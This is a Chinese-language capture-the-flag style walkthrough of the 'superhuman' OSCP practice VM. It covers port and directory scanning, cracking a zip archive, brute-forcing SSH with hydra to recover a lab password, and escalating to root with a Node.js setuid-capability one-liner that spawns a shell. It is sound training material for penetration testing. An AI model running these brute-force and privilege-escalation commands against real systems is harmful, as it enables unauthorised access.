【OSCP】superhuman

OSCP 靶场

靶场介绍

信息收集

主机发现

nmap -sn 192.168.1.0/24

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.41 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-20 04:04 EST
Nmap scan report for 192.168.1.41
Host is up (0.00066s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9e:41:5a:43:d8:b3:31:18:0f:2e:32:36:cf:68:c4:b7 (RSA)
|   256 6f:24:81:b4:3d:e5:b9:c8:47:bf:b2:8b:bf:41:2d:51 (ECDSA)
|_  256 49:5f:c0:7a:42:20:76:76:d5:29:1a:65:bf:87:d2:24 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:A6:FD:8E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.66 ms 192.168.1.41

目录扫描

访问web一片空白，只留下一句 If your eye was sharper, you would see everything in motion, lol 。还有一张尼采的图片。

图片存在密码，但是爆破失败了。

└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt      -u http://192.168.1.41 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.41
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.41/.html                (Status: 403) [Size: 277]
http://192.168.1.41/index.html           (Status: 200) [Size: 658]
http://192.168.1.41/.html                (Status: 403) [Size: 277]
http://192.168.1.41/server-status        (Status: 403) [Size: 277]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

更换大字典，重新扫描后获取note文本，里面是一段ascii85编码的数据

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt      -u http://192.168.1.41/ -x html,php,txt -e

https://www.dcode.fr/cipher-identifier
https://www.dcode.fr/ascii-85-encoding

根据提示进行fuzz，关键字、salome_and_?? 和扩展名，莫非是压缩包？

ffuf -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt  -u http://192.168.1.41/salome_and_FUZZ.zip

猜测对了，还真的是压缩包

可恶，但是还需要密码，使用john 进行爆破成功获取压缩包密码

到这里想骂人了，一首诗？

权限获取

利用文本里面的提示，制作字典爆破ssh 获取权限

┌──(root㉿kali)-[~]
└─# hydra -L user.txt -P user.txt ssh://192.168.1.41
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-20 04:49:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 81 login tries (l:9/p:9), ~6 tries per task
[DATA] attacking ssh://192.168.1.41:22/
[22][ssh] host: 192.168.1.41 login: fred password: schopenhauer
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-20 04:50:01

┌──(root㉿kali)-[~]
└─# cat user.txt
salome
fred
asshole
schopenhauer
lonely
scared
lady
baby
darling

奇葩，执行ls 就退出了。可能命令被替换了。

这种情况我们可以找同样版本系统的ls 替换本地ls，但是我们权限不够。所以直接下载busybox方便简单。

权限提升

fred@superhuman:~$ getcap
-bash: getcap: command not found
fred@superhuman:~$ which getcap
fred@superhuman:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/node = cap_setuid+ep
fred@superhuman:~$ getcap
-bash: getcap: command not found
fred@superhuman:~$ which getcap
fred@superhuman:~$ find / -type f -name getcap 2>/dev/null
/usr/sbin/getcap
fred@superhuman:~$ /usr/sbin/getcap
usage: getcap [-v] [-r] [-h] <filename> [<filename> ...]

displays the capabilities on the queried file(s).
fred@superhuman:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/node = cap_setuid+ep
fred@superhuman:~$

https://gtfobins.github.io/#node

执行如下命令成功提权到root 权限

/usr/bin/node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'

原文始发于微信公众号（贝雷帽SEC）：【OSCP】superhuman